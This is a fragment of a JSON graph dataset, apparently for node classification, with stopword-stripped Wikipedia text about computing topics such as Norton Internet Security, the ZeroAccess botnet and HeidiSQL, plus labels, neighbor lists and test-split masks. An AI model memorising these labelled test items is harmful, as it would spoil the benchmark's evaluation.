    "text": "Steve_Sakoman:steve sakoman steve sakoman american computing executive retired apple computer 2005 independent consultant originally worked hewlett-packard manufacturing engineer project manager industry first battery-powered portable ms-dos pc hp 110 sakoman moved apple computer 1984 would oversee hardware groups responsible apple ii macintosh product lines 1987 formed team behind apple newton realize vision world first pda sakoman left apple 1990 newton shipped set inc. former apple executive jean-louis gassée led development original bebox personally developed beos support brooktree video-capture devices eventually worked company chief operating officer time ran webcam inside offices using codycam application 1994 moved silicon graphics director consumer products technologies group included work nintendo 64 graphics system returned 1996 palmsource acquired 2001 sakoman took role chief products officer key member team behind palm os 6 sakoman rejoined apple 2003 vice-president software technology reporting avie tevanian sakoman also set gutentalk 2004 site discuss ebooks specially formatted pdas hand-held readers",
    "neighbors": [
      5384,
      10051,
      4251,
      11118
    ],
    "mask": "Test"
  },
  {
    "node_id": 10872,
    "label": 4,
    "text": "Norton_Internet_Security:norton internet security norton internet security developed symantec corporation computer program provides malware prevention removal subscription period uses signatures heuristics identify viruses features included product personal firewall email spam filtering phishing protection release 2015 line summer 2014 symantec officially retired norton internet security 14 years chief norton product superseded norton security rechristened adaptation norton 360 security suite symantec distributed product download boxed compact disc cd copy oem software retailers also distributed usb flash drive norton internet security held 61 market share united states retail security suite category first half 2007 study competitors terms market share included security suites ca inc. trend micro kaspersky lab august 1990 symantec acquired peter norton computing peter norton norton company developed various applications dos including antivirus symantec continued development acquired technologies marketed name norton tagline symantec norton crossed-arm pose registered u.s. trademark featured norton product packaging however pose later moved spine packaging later dropped altogether users 2006 later versions upgrade latest version norton software without buying new subscription upgraded product retains number days left user subscription releases named year internal version numbers well internal version number advanced 15.x 2008 edition match norton antivirus release year 2013 20.x release product dropped year name although still referenced places norton internet security 2000 released january 10 2000 symantec first foray beyond virus protection content control filters release followed alliance internet provider excite home antivirus vendor mcafee.com provide internet subscribers mcafee new firewall software mcafee personal firewall version 2000s firewall based atguard wrq filters traffic packet level block activex controls java applets functionalities include cookie removal banner ad blocking zdnet found ad blocker removed graphics ads breaking pages adjusting settings fixed problem however process complicated zdnet noted lack information presented concerning attacks firewall blocked norton liveupdate downloads installs program updates family edition adds parental controls parental controls backed quality control team 10 searching web inappropriate content found content categorized subject matter placed blacklist 36,000 sites designed administrator add blocked sites however pre-supplied blacklist viewed edited since hard coded administrators block certain subject matters another option block sites create whitelist allowed sites family edition also block transmission specified personal information information replaced letter x however cnn noted x-rated sites retrieved personal information queried search engine version 2.0 released june 12 2000 version 2001 2.5 released september 18 2000 adding support windows addition windows 9x series windows nt windows 2000 following attacks iloveyou anna kournikova script viruses version block malicious scripts without virus signatures analyzing behavior firewall scans internet-enabled applications creates access rules based knowledge base maintained symantec installation pc magazine testing installation took 24 minutes complete 750 mhz pentium iii 92 internet-enabled applications using firewall users determine whether accept cookies java applets activex controls global per-site basis new feature intrusion detection autoblock detect port scans block intrusion attempts program provides notifications intrusion attempts stating severity level providing access threat details alternatively firewall put computer stealth essentially hiding system users configure security level affecting number notifications testing conducted pc magazine using shields symantec security check found firewall successfully stealthed ports hiding computer view leak test conducted see firewall ability detect outbound connections attempt detected suite offered block attempts family edition like prior version includes parental controls information filtering feature parental controls come list objectionable sites separated 32 categories list updated every two weeks norton liveupdate using list alone norton blocks sites present list consequently norton may block sites next update parents customize list adding removing sites list allowed sites created restrict children specific sites version uses application blocking rather protocol port filtering control internet access children restricted applications used access internet parental controls profile set child settings automatically configured based age group whether child teenager adult administrator internet usage violations noted report presented parents pc magazine found enabling parental controls added minute computer boot time version 3.0 released march 19 2001 version 2002 announced august 28 2001 family edition dropped parental controls information filtering bundled release installation noted quick simple pc magazine cnet installation requires reboot afterwards security assistant guides users questionnaire best configure settings problem cnet encountered upgrading prior release loss customized settings pc magazine found default settings aimed avoiding frequent notifications somewhat permissive windows 95 support also dropped running full scan complies list internet-enabled applications users set permissions accept norton default settings firewall detects blocks port scans logs intrusion attempts version run trace attackers however symantec planning online tool ensure rogue programs masquerade trustworthy applications norton verifies programs list digital signatures known programs update tracker warns users hackers attempt gain access users computers firewall blocked access attempts shields port checker version includes wizard simplify firewall setup accommodate multiple computers sharing internet connection release norton prevent specified personal information transmitted via compatible instant messenger client e-mail websites ad-blocking includes ad trashcan users place ads slipped past ad-filtering professional edition announced december 11 2001 marketing aimed towards business owners version features norton intrusion detection intercepts suspicious connections attacks code red worm intrusion detection focuses windows-based attacks central management also present version administrators configure firewall productivity settings client computers productivity settings allow administrators block newsgroups websites advertisements suite integrates xp user accounts settings personalized user version 2003 announced september 16 2002 scheduled available purchase later month version adds norton spam alert reduce spam filtering scans whole message context rather looking keywords ensure accuracy pop3 client must used message identified spam norton inserts identifier default spam alert subject line using mail client users create rule delete move flagged messages users also create strings text spam alert look classifying e-mail pc magazine testing spam alert mistakenly classified 2.8 percent legitimate e-mail spam 47 percent spam slipped past filter although false positive rate low feature fare well finding actual spam updated main interface green red indicators show features active need attention firewall several updated features version block traffic button present main interface blocks incoming outgoing internet traffic another new feature visual tracker graphically maps attacks back origin firewall blocked port scans conducted cnet stealthing port following nimda code red worms version scans incoming outgoing traffic suspicious data exchanges routinely updated database feature ported norton internet security 2002 professional edition connection offending computer automatically severed traffic matches database item symantec announced professional edition november 19 2002 data recovery tools version allow users recover deleted malware-damaged files inclusion data erasure tool allows users delete files minimizing chance recovery web cleanup removes browser cache files history cookies maintain dial-up connections connection keep alive simulates online activity periods user inactivity norton productivity control enables users filter internet content block newsgroups used user access manager multiple filtering profiles created assigned different users announced september 8 2003 version 2004 adds adware spyware keylogger protection pc magazine found added protection weak spyware samples norton detected significant number removed completely requiring manual removal norton also little prevent spyware infections norton antispam renamed spam filtering feature set spam rules viewed edited whitelists blacklists senders created users may also create spam definitions antispam integrates outlook outlook express eudora allowing users tag e-mail spam on-the-fly e-mail identified spam either quarantined default however feature configured delete messages automatically cnet testing antispam correctly identified 94 percent spam messages product activation introduced release installation users allowed 15-day grace period activate copy norton internet security 2004 program work deadline without 24-character product key product key used activate copy norton internet security ties alphanumeric code based computer hardware configuration users may activate product five times product key however licensing terms dictate users allowed install norton internet security 2004 one computer symantec introduced version 2005 august 17 2004 version sometimes referred tagline antispyware edition since spyware detection integrated norton default enabled found threats listed separating ones already dealt ones requiring user interaction detailed information provided link symantec website however pc pro pc magazine noted lengthy scan times full scan took 24 minutes half hour respectively pc pro testing norton detected 61 percent spyware samples compared average 68 percent tested products removal rates average 72 percent versus average 68 percent norton blocked reinstallation score 48 percent compared group average 43 percent overall norton ranked fifth among tested products pc magazine testing norton installed slowly infected systems failed install one altogether contacting symantec resolve issue new features include internet worm protection block worms scan ip addresses open ports also blocks inbound ports based known suspected exploits using signatures heuristics addition feature follows msblast 2003 sasser 2004 worms exploited vulnerability microsoft windows operating systems response emerging privacy threats — 75 percent threats last 12 months attempted steal confidential information — version adds phishing protection using firewall component users create whitelist sites confidential information transmitted users alerted information transmitted site list outbreak alert feature warns users major threats classified symantec users press fix button applies set changes close vulnerabilities blocking necessary ports used propagating worm browser privacy suppress information website generally receive visitors browser operating system used feature also block advertisements privacy control warn users sending confidential information also configured block transmission allows users specify information sent via im e-mail item-specific exceptions allow users control data sent however pc pro found flaw information filtering feature way information formatted list confidential information affect effectiveness example entering last six digits credit card number stop numbers leaking grouped four digits pc magazine also noted fact anyone login computer view database private information reason symantec recommends entering last portion sensitive information norton antispam scans e-mails spoofed urls deals offending e-mail spam e-mails also blocked based language however default filter allows languages antispam sync list allowed senders pop3 address books users train spam filter pointing valid e-mail marked spam vice versa support yahoo mail hotmail added release norton internet security 2006 debuted september 26 2005 new main interface norton protection center aggregates information central location security status shown secure computer tasks e-mail internet browsing context features enabled protection center also recognize third-party software protecting computer new interface advertises additional products symantec categories protection data protection read coverage user purchases installs norton systemworks additional system tray icon created protection center installation noted lengthy pc magazine especially malware-infected systems spyware detection tweaked since last release updated better identify keyloggers pc magazine testing norton successfully detected 11 spyware threats removed two pc magazine give norton credit even manual removal required suite also removed three four commercial keyloggers attempting install spyware clean system norton blocked 11 two four commercial keyloggers cases block installation however norton call scan spyware installed pc pro testing norton detected 78 percent spyware removed 82 percent blocked 65 percent installing norton antispam discontinued separate product symantec available norton internet security feature block e-mail unknown senders automatically blocks messages suspicious elements invisible text html forms phishing urls improve accuracy norton analyzes outgoing e-mails messages whose categorization corrected users hitting spam spam buttons pc magazine testing feature marked one ten valid e-mail spam let one every six spam messages inbox 400 messages used program allowed process messages week pc pro testing feature performed better blocking 96 percent spam false positive rate 0.2 percent norton recommends disabling windows firewall avoid redundant alerts firewall stealthed significant ports pc magazine testing attacking firewall unsuccessful pc magazine unable stop service terminate process disable firewall using simulated mouse clicks firewall also passed pc pro tests successfully stealthing ports features include bloodhound technology looks virus-like behavior better find zero day viruses security inspector looks common vulnerabilities including insecure user account passwords browser insecurities advertisement blocking rewrites website html prevent advertisements displayed parental controls optional component block certain programs accessing internet im clients restrict newsgroup access restrictions assigned different windows users accounts sites classified 31 categories four profiles assigned block different categories sites supervisors define exceptions add global blocked sites block access sites user-created whitelist pc magazine pc pro noted exclusion time-based restrictions information filtering controlled per-user basis windows 98 compatibility dropped release 2007 version announced september 12 2006 tabbed interface allows users access norton protection center program settings without separate tray icons windows open symantec revised norton internet security made version modularized reduced suite memory usage 10–15 megabytes scan times 30–35 percent another result spam filtering parental controls separate components install installed features consume 100 mb disk space anti-phishing integrates internet explorer analyzes sites examining website url title form page layout visible text links uses blacklist detect phishing sites users blocked access suspected phishing sites however presented option continue pc magazine testing feature blocked 22 24 phishing sites internet explorer 7 recognized 17 24 sites pc pro testing feature successfully blocked access every phishing site tested spam filtering longer includes language feature symantec claims less useful current spam created false positives tested 1,500 messages pc magazine norton let half spam inbox five percent valid mail marked spam version utilizes symantec veritas vxms technology better identify rootkits vxms allows norton find inconsistencies among files within directories files volume level startup application manager allows users prevent applications launching login release drops support windows 2000 compatible windows vista upon release update firewall makes decisions lessen chance weakened misinformed decision applications known safe allowed internet access vice versa malicious applications unknown ones analyzed blocked exhibit malicious behavior pc magazine pc pro testing firewall incorrectly block safe applications internet access malware blocked firewall pc magazine testing reflected results firewall also stealthed ports exploits blocked intrusion prevention system prevents threats leveraging vulnerabilities system updated whenever vulnerability identified windows-based computers attempts disable firewall unsuccessful registry changes process termination simulated mouse clicks failed disabling windows services effect firewall since works kernel driver level version automatically adjusts configuration different networks based physical address gateway rather ip addresses pc magazine testing norton detected 15 16 spyware samples 13 16 removed eight commercial keyloggers suite removed samples clean system norton blocked 14 16 spyware samples installing stopped seven eight keyloggers installing 2008 version announced august 28 2007 adding support windows vista 64-bit new features include sonar norton identity safe browser defender sonar monitors applications malicious behavior identity safe supersedes information filtering function instead blocking personal information leaving computer stores personal information fill webforms password protected checks website authenticity filling forms browser defender inspects blocks suspicious api calls intended stop drive-by downloads network map identifies networked computers norton internet security 2008 installed remote monitoring allows checking status installations different computers problems identified red x icon using feature users also control network traffic computers also warns users using unencrypted wireless network startup application manager advertisement blocking features dropped release information filtering although superseded identity safe suite available separately used conjunction identity safe phishing protection integrates mozilla firefox testing pc magazine found norton blocked 94 percent phishing sites compared 83 percent internet explorer 7 77 percent firefox 2 cnet identified issue feature anti-phishing disabled identity safe still offers users automatically submit personal information websites including phishing sites symantec declined call flaw stating recommended use identity safe anti-phishing enabled alternatively identity safe could used firefox internet explorer built-in anti-phishing capability pc magazine found firewall put ports stealth mode firewall blocked ten 12 leak tests used see malware evade firewall control network traffic previous versions identify tests none carried malicious payload another test conducted using core impact successfully exploited one vulnerability test computer however components norton stopped exploit causing harm attempts unsuccessful either system invulnerable norton intrusion prevention system stopped attempts disable firewall unsuccessful pc magazine contrary pc pro identified 15 open ports computer norton installed pc magazine testing norton completely detected malware samples two-thirds samples traces removed norton found removed commercial keyloggers full scan took nearly hour complete though twice long 2007 version suite blocked malware installing commercial keyloggers regardless modifications made samples pc world noted norton removed 80 percent malware-associated files registry entries spam filtering imports users address books compile whitelist allowed senders addresses users send mail e-mail tagged valid mail automatically added whitelist using several thousand messages pc magazine found norton marked 40 percent valid e-mail spam 80 percent valid newsletters marked spam norton correctly identify 90 percent spam e-mail 2009 version released sale september 9 2008 symantec set several goals version 2009 development complete installations minute footprint 100 mb average installation times range eight ten minutes previous 2008 version 400 mb footprint goals included reducing load time computer starts 20–30 seconds 10 seconds file scanning times technology allowing norton skip certain trusted files technology works basis piece software runs significant proportion computers safe public beta released july 14 reduction memory consumption made prompted fact 40 percent people contacting symantec support 512 mb ram beta uses 6 mb memory compared 11 mb prior version reduce scan times norton insight uses data norton community participants avoid scanning files found statistically significant number computers citing npd group study finding 39 percent consumers switching antiviruses blamed performance cpu usage meter available within final product allow users find cause high cpu usage whether norton another program version features frequent updates change called norton pulse updates rather deliver update every eight hours 2008 version pulse updates delivered five fifteen minutes silent mode automatically suspends alerts updates program enters mode manually enabled suite activities take place computer idle terminate user activity registered final release 16.5 bundles spam filtering used free download symantec release also bundles norton safe web identifies malicious websites compatible internet explorer firefox norton safe web color codes search results famous search engine google yahoo safety norton safe web toolbar also includes ask.com search box search box share code ask toolbar instead box redirects queries ask search engine norton safe web compatible internet explorer firefox norton safe web benchmarking conducted passmark software highlights 2009 version 52 second install time 32 second scan time 7 mb memory utilization symantec funded benchmark test provided scripts used benchmark participating antivirus software tests conducted windows vista running dual core processor pc magazine found suite added 15 seconds boot time baseline 60 seconds norton added less 5 percent time takes complete file operations 25 percent time taken unzip zip set files pc magazine testing norton removed traces 40 percent malware similar test specifically using commercial keyloggers norton able remove keyloggers beating tested products norton blocked attempts install malware clean system modifications made samples fool norton norton able block installation commercial keyloggers phishing protection blocked 90 percent verified phishing websites pc magazine testing internet explorer 7 caught 75 percent firefox caught 60 percent norton stealthed ports according pc magazine port scans unsuccessful firewall blocked exploit attempts core impact malware blocking removal garnered good results pc magazine testing one malware samples contained within folder removed folder opened last one removed executed modifications made samples affect detection similar test specifically using commercial keyloggers norton successfully detect removing threats norton almost completely removed 40 percent malware samples related executables norton also able remove commercial keyloggers product version 2010 released officially september 8 2009 version features technology code named project quorum introduces reputation-based threat detection keep 200 million attacks month many symantec claims evade signature based detection new approach relies norton community watch participants send information applications running computers safe applications exhibit common attributes known origin known publishers conversely new malware may unknown publisher among attributes using data reputation score calculated used infer likelihood unknown application safe malicious facets quorum parental controls spam filtering norton internet security 2010 bundles free subscription onlinefamily.norton pc magazine found improvement parental controls bundled prior releases spam filtering uses technologies symantec acquired brightmail two filters used find spam locally installed one check symantec servers see message known spam pc magazine testing valid e-mail marked spam however 11 percent spam still made inbox significant improvement prior releases another improvement product improved heuristic feature called sonar 2 leverages reputation data judge program malicious clean norton insight also expanded showing users number norton community participants certain program installed impact system resources long released information program origin graph resource usage also provided new feature codenamed autospy helps users understand norton malware found malware actions norton resolution presented user previous releases removed threats sight quietly warned users potentially confusing users deceived downloading rogue security software another addition product new flip screen compatible graphics card main display flips show opposite side main interface consisting chart cpu memory usage timeline security events without one flip screen link replaced back link opens back windows separate window product also adds search engine labeled safe search custom search allows user filter unsafe sites get insight keep track http cookies malware removal blocking performed well setting meeting records pc magazine testing achieved detection rate 98 highest 12 tested antivirus products exception blocking commercial keyloggers norton made average score file operations took 2 percent longer file compression extraction test took 4 percent longer area norton introduced significant delay system booting beta version suite added 31 percent boot time significantly longer prior versions according norton performance comparison website norton internet security scans 31 percent faster 70 percent lighter installs 76 percent faster leading anti-virus product according av-comparatives norton internet security best product 2009 bronze award 98.6 detection rate 2010 norton internet security 2010 blocked 99/100 internet threats infecting user computer norton internet security 2011 released beta testing april 21 2010 changes include new user interface improved scanning internet sites malware 2011 version symantec also released application scans user facebook feed malware links application require valid subscription test sponsored symantec norton internet security 2011 security suite ever achieve 100 percent protection score new third-party test dennis labs improved reputation scan provides user easy understand interface files stored user computer marking trusted good poor bad final version norton internet security 2011 released august 31 2010 new features version 2011 also include norton rescue tools tools include norton bootable recovery tool norton power eraser december 9 2010 symantec released 18.5 version norton liveupdate however update later pulled due numerous reports norton forums update causing system instability freeze ups system scans full quick scans issue affects customers users affected update advised uninstall product run norton removal tool reinstall 18.1 version http //www.norton.com/nis11 symantec later fixed bugs re-released update following acquisition verisign security norton parent company symantec several verisign features incorporated 2011 edition new product features new norton logo uses verisign checkmark formerly seen verisign logo well several new icon changes norton safe web norton identity safe features released 19.1.0.28 september 6 2011 norton internet security 2012 brought new features one new features included new release download insight 2.0 monitors files safety also stability given file means file stable windows 7 unstable windows xp xp users notified file instability enhanced removal tools tightly integrated better cleanup already infected systems triggered new powerful version norton power eraser restarts system locate remove fake antivirus software fake antivirus software deeply embedded threats otherwise hard remove new tool called norton management helps manage different computers devices equipped norton software single location changes release include sonar 4 google chrome compatibility identity safe safe web ability store passwords notes cloud however license agreement guarantee passwords stored securely provides remedy cloud vault compromised user interface also simplified three buttons third button opens advanced complicated menu user able manage settings access different product features cpu meter removed norton 2011 also makes return advanced screen combining netbook desktop line norton internet security integrates bandwidth metering controls product traffic usage takes minimum necessary ideal networks limited traffic also user interface window adjusts accordingly size computer screen version norton internet security includes several easter eggs pressing shift+1 2 3 4 would change theme default background plain black ray animals floral respectively also holding control win key alt pressing performance button activate crazy flip make window flip head heels effect would continue main window closed reopened furthermore scans longer scheduled windows task scheduler symantec proprietary one performs tasks computer idle i.e. user away computer version 20 2013 began version-less approach dropping 20xx naming convention automatically update new releases become available notable changes include new user interface better suited touchscreen devices social networking protection intends protect threats targeted social networks also first release officially support windows 8 version released october 7 2013 became last version marketed symantec norton internet security along norton antivirus norton 360 replaced norton security version 22.5 update released june 2015 includes restyled user interface windows 10 support september 2014 norton internet security folded norton security part symantec streamlined norton line symantec released special edition norton internet security optimized netbooks available download symantec website usb thumb drive symantec states netbook edition optimized netbooks main display optimized provide support 800 x 480 screen resolution addition non-critical tasks delayed netbook battery furthermore netbook edition contains complimentary access norton secure online backup parental control protect children surf web norton internet security version 1.0 mac released november 1 2000 identify remove windows mac viruses features include firewall advertisement blocking browser parental controls ability prevent confidential information transmitted outside computer users prompted information able transmitted incorporation aladdin systems iclean allows users purge browser cache cookies browsing history within norton interface operating system requirements call mac os 8.1 hardware requirements call 24 mb ram 12 mb disk space powerpc processor norton internet security version 2.0 mac released date unknown know please provide version 2.0 also ties whois database allowing users trace attacking computers users inform network administrators attacking computers corrective actions running mac os 8.1 9 powerpc processor 24 mb ram 25 mb free space required mac os x 10.1 powerpc g3 processor 128 mb ram 25 mb free space required norton internet security version 3.0 mac released date unknown know please provide subsequent release version 3.0 maintained feature set found version 2.0 firewall allocates internet access needed rather relying user input using predefined rules compatibility os 8 dropped running os 9.2 powerpc processor 24 mb ram 25 mb free space required os x 10.1.5 10.3 powerpc g3 128 mb ram 150 mb free space required however version 3.0 compatible mac os x 10.4 tiger version 4.0 released december 18 2008 symantec also markets bundle version 4.0 2009 version windows intended users microsoft windows mac os x installed iclean dropped release firewall blocks access malicious sites using blacklist updated symantec prevent attackers leveraging insecurities mac installed software exploit protection introduced release phishing protection introduced release well operating system requirements call mac os x 10.4.11 higher powerpc intel core processor 256 mb ram 150 mb free space required features norton internet security underwent considerable changes performance symantec rewrote code 2009 release norton products two running processes using 15 mb ram according passmark security benchmark 2012 norton antivirus norton internet security lightest suites available av-comparatives.org also tested products gave similar results pc magazine recognized 2011 2012 lines fastest strongest protection pcworld tests security software put norton internet security 2009 first place 2011 test conducted pc world norton internet security winner dennis technology labs tests sponsored symantec confirmed performance effectiveness norton 2011 2012 lines symantec compliance federal bureau investigation fbi whitelisted magic lantern keylogger actively developed fbi purpose magic lantern obtain passwords encrypted e-mail part criminal investigation magic lantern first reported media bob sullivan msnbc november 20 2001 ted bridis associated press magic lantern deployed e-mail attachment attachment opened trojan horse installed suspect computer trojan horse activated suspect uses pgp encryption often used increase security sent e-mail messages activated trojan horse log pgp password allows fbi decrypt user communications symantec major antivirus vendors whitelisted magic lantern rendering antivirus products including norton internet security incapable detecting concerns include uncertainties magic lantern full potential whether hackers could subvert purposes outside jurisdiction law graham cluley technology consultant sophos said way knowing written fbi even ’ know whether used fbi commandeered third party another reaction came marc maiffret chief technical officer cofounder eeye digital security customers paying us service protect forms malicious code us law enforcement job make exceptions law enforcement malware tools fbi spokesman paul bresson response question whether magic lantern needed court order deployed said like technology projects tools deployed fbi would used pursuant appropriate legal process proponents magic lantern argue technology would allow law enforcement efficiently quickly decrypt messages protected encryption schemes unlike predecessor carnivore implementing magic lantern require physical access suspect computer would necessitate court order older versions norton hard slow uninstall leaving many traces sometimes completing errors however 2009 versions symantec featured uninstaller removes products better quickly usually less minute norton removal tool well known instrument removes norton products completely without trace tool downloaded symantec website symantec reports norton 2010 range products feature cleaner uninstall over-installs recommended update route 2011 link norton internet security 2008 installed users may encounter incompatibilities upgrading windows xp service pack 3 windows vista service pack 1 users report numerous invalid registry keys added tool named fixcss.exe resulting empty device manager missing devices wireless network adapters symantec initially blamed microsoft incompatibilities since accepted partial responsibility dave cole symantec vice president general manager acknowledged users running norton products experiencing problems said numbers small cole also said symantec done extensive testing products windows xp sp3 issue encountered cole blamed microsoft related xp sp3 microsoft recommended users contact windows customer support resolve problem symantec issued fix intended users upgrading symantec also recommends disabling tamper protection component 2008 release dubbed symprotect tool remove added registry entries also available symantec sarah hicks symantec vice president consumer product management voiced concern windows vista 64-bit patchguard feature patchguard designed microsoft ensure integrity kernel part operating system interacts hardware rootkits often hide operating system kernel complicating removal mike dalton european president mcafee said decision build wall around kernel assumption ca n't breached ridiculous claiming microsoft preventing security vendors effectively protecting kernel promoting security product windows live onecare hicks said symantec mind competition onecare symantec later published white paper detailing patchguard instructions obtain patchguard exploit negotiations investigations antitrust regulators microsoft decided allow security vendors access kernel creating special api instructions",
    "neighbors": [
      2049,
      2563,
      5636,
      10756,
      8204,
      9746,
      1052,
      9757,
      550,
      10790,
      2601,
      6699,
      8753,
      9780,
      569,
      7739,
      9279,
      576,
      9791,
      10308,
      4165,
      2118,
      8283,
      2654,
      3167,
      11368,
      8816,
      4722,
      3702,
      9341,
      127,
      7809,
      131,
      1172,
      10903,
      10392,
      6297,
      156,
      2721,
      2213,
      6823,
      3243,
      1708,
      8368,
      6834,
      10935,
      704,
      10433,
      7362,
      202,
      4814,
      8398,
      9423,
      10451,
      1242,
      6364,
      5860,
      10987,
      8943,
      10479,
      9971,
      1273,
      9983,
      1792,
      10501,
      3852,
      8976,
      8978,
      7955,
      4374,
      9496,
      7965,
      6431,
      10531,
      5924,
      1318,
      8998,
      10026,
      2859,
      3885,
      7983,
      4403,
      2870,
      11065,
      9537,
      1858,
      11073,
      4421,
      2378,
      1355,
      10574,
      4953,
      2907,
      7515,
      9055,
      9569,
      3941,
      3942,
      11622,
      877,
      4464,
      3955,
      10613,
      6520,
      8572,
      4480,
      5512,
      1417,
      6028,
      5526,
      3482,
      4511,
      5536,
      8614,
      8615,
      10166,
      3520,
      5057,
      5069,
      7121,
      10708,
      2005,
      4568,
      11225,
      8668,
      3555,
      9713,
      6643,
      2041,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 10873,
    "label": 1,
    "text": "HeidiSQL:heidisql heidisql free open-source administration tool mysql forks well microsoft sql server postgresql codebase originally taken ansgar becker mysql-front 2.5 software due sold mysql-front branding unrelated party becker chose heidisql replacement name suggested friend tribute heidi klum reinforced becker nostalgia heidi girl alps version written java jheidi designed work mac linux computers discontinued march 2010 favor wine support ansgar becker began development mysql front-end 1999 naming project mysql-front used direct api layer written matthias fichtner interface mysql servers contained databases private development continued 2003 version 2.5 2004 period inactivity becker sold mysql-front branding nils hoyer continued development cloning original software april 2006 becker open-sourced application sourceforge renaming project heidisql heidisql re-engineered use newer popular database-interface layer zeoslib debuted version 3.0 database layer replaced single-unit approach october 2009 becker later extended supporting database servers support microsoft sql server added march 2011 7.0 release since 8.0 release heidisql offers gui 22 languages english translations contributed users various countries via transifex postgresql support introduced march 2014 9.0 release early 2018 slightly extended v9.5 release published microsoft store heidisql following gui features capabilities",
    "neighbors": [
      11392,
      8195,
      9868,
      6797,
      10258,
      11030,
      7453,
      1950,
      9503,
      7339,
      5677,
      7983,
      9010,
      6721,
      5964,
      5198,
      7506,
      9687,
      9177,
      8539,
      10459,
      1632,
      6245,
      8295,
      8683,
      2413,
      7022,
      3188,
      2810
    ],
    "mask": "Test"
  },
  {
    "node_id": 10874,
    "label": 7,
    "text": "GameSpy_Technology:gamespy technology gamespy technology also known gamespy industries inc. division glu mobile developer gamespy technology product suite middleware tools software services use computer video game industry gamespy technology acquired glu mobile 2012 company service shut may 2014 gamespy shut gamespy technology consisted array portable c sdks plug hosted web services provided following functionality game engines",
    "neighbors": [
      9732,
      8937,
      10316,
      6797,
      3792,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 10875,
    "label": 4,
    "text": "ZeroAccess_botnet:zeroaccess botnet zeroaccess trojan horse computer malware affects microsoft windows operating systems used download malware infected machine botnet remaining hidden using rootkit techniques zeroaccess botnet discovered least around may 2011 zeroaccess rootkit responsible botnet spread estimated present least 9 million systems estimates size botnet vary across sources antivirus vendor sophos estimated botnet size around 1 million active infected machines third quarter 2012 security firm kindsight estimated 2.2 million infected active systems bot spread zeroaccess rootkit variety attack vectors one attack vector form social engineering user persuaded execute malicious code either disguising legitimate file including hidden additional payload executable announces example bypassing copyright protection keygen second attack vector utilizes advertising network order user click advertisement redirects site hosting malicious software third infection vector used affiliate scheme third party persons paid installing rootkit system december 2013 coalition led microsoft moved destroy command control network botnet attack ineffective though c c seized peer-to-peer command control component unaffected meaning botnet could still updated system infected zeroaccess rootkit start one two main botnet operations bitcoin mining click fraud machines involved bitcoin mining generate bitcoins controller estimated worth 2.7 million us dollars per year september 2012 machines used click fraud simulate clicks website advertisements paid pay per click basis estimated profit activity may high 100,000 us dollars per day costing advertisers 900,000 day fraudulent clicks typically zeroaccess infects master boot record mbr infected machine may alternatively infect random driver c \\windows\\system32\\drivers giving total control operating system also disables windows security center firewall windows defender operating system zeroaccess also hooks tcp/ip stack help click fraud software also looks tidserv malware removes finds",
    "neighbors": [
      1024,
      3072,
      5636,
      10756,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      4648,
      46,
      10297,
      3643,
      7739,
      1087,
      9791,
      1608,
      3657,
      8779,
      81,
      8789,
      4703,
      8288,
      8292,
      10875,
      3711,
      8320,
      5764,
      2187,
      3724,
      6797,
      4240,
      1688,
      2717,
      9375,
      9904,
      9395,
      8886,
      10952,
      3789,
      4304,
      10457,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      7418,
      5886,
      2815,
      3843,
      4356,
      10502,
      3347,
      4883,
      2325,
      278,
      10003,
      7449,
      3867,
      297,
      2857,
      8489,
      11052,
      9518,
      7983,
      1337,
      7996,
      11583,
      9536,
      6484,
      857,
      1882,
      7515,
      9055,
      8032,
      3941,
      4462,
      3956,
      9082,
      9087,
      11152,
      10132,
      9630,
      1440,
      5024,
      10657,
      5028,
      11175,
      939,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      9664,
      9154,
      8133,
      2508,
      4054,
      7639,
      8664,
      988,
      1504,
      9186,
      2542,
      4083,
      2041,
      507,
      3581
    ],
    "mask": "Test"
  },
  {
    "node_id": 10876,
    "label": 4,
    "text": "NEC_HYDRAstor:nec hydrastor nec hydrastor disk-based grid storage system data deduplication backups archiving developed nec corporation hydrastor storage system composed multiple nodes starting one 100+ nodes node contains standard hardware including disk drives cpu memory network interfaces integrated hydrastor software single storage pool hydrastor software incorporates multiple features distributed storage systems content-addressable storage global data deduplication variable block size rabin fingerprinting erasure codes data encryption load balancing hydrastor project started 2002 cezary dubnicki cristian ungureanu nec research princeton nj prototype version implemented evaluated 2004 another 3 years development first version hydrastor brought market us japan subsequent version improved software hardware released following years latest version hs8-5000 providing 72tb raw storage per node 11.88pb raw capacity maximum configuration hydrastor scaled single node 165 nodes multi-rack grid appliance capacity bandwidth scaled independently using different types nodes hydrastor supports online expansion automatic data migration downtime standard configuration hydrastor provides resiliency 3 concurrent disk node failures failures automatically detected data reconstruction automatically performed means time failures enough reconstruct data system withstand number",
    "neighbors": [
      8355,
      3366,
      5612,
      3629,
      8671
    ],
    "mask": "None"
  },
  {
    "node_id": 10877,
    "label": 8,
    "text": "GlassFish_Metro:glassfish metro metro opensource web service stack part glassfish project though also used stand-alone configuration components metro include jaxb ri jax-ws ri saaj ri stax sjsxp implementation wsit available cddl gplv2 classpath exception originally glassfish project developed two semi-independent projects june 2007 decided bundle two components single component named metro metro bundled java se 6 order allow consumers java se 6 consume web services metro bundled numerous application servers jaxb reference implementation developed metro used virtually every java web services framework apache axis2 codehaus xfire apache cxf application servers metro compares well web service frameworks terms functionality comparison provided codehaus compares apache axis 1.x axis 2.x celtix glue jbossws xfire 1.2 jax-ws ri wsit bundle yet named metro time",
    "neighbors": [
      4740,
      10020,
      1128,
      8425,
      3562,
      3573,
      1851,
      7261
    ],
    "mask": "None"
  },
  {
    "node_id": 10878,
    "label": 2,
